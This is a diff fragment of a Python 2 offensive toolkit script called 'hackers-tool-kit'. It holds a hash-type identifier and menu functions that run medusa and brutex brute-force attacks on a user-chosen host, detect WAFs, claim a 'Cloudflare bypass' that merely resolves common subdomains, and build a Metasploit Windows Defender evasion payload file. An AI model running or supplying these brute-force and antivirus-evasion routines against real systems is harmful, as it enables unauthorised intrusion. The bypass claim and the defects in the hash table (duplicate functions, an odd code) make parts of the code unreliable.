jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") 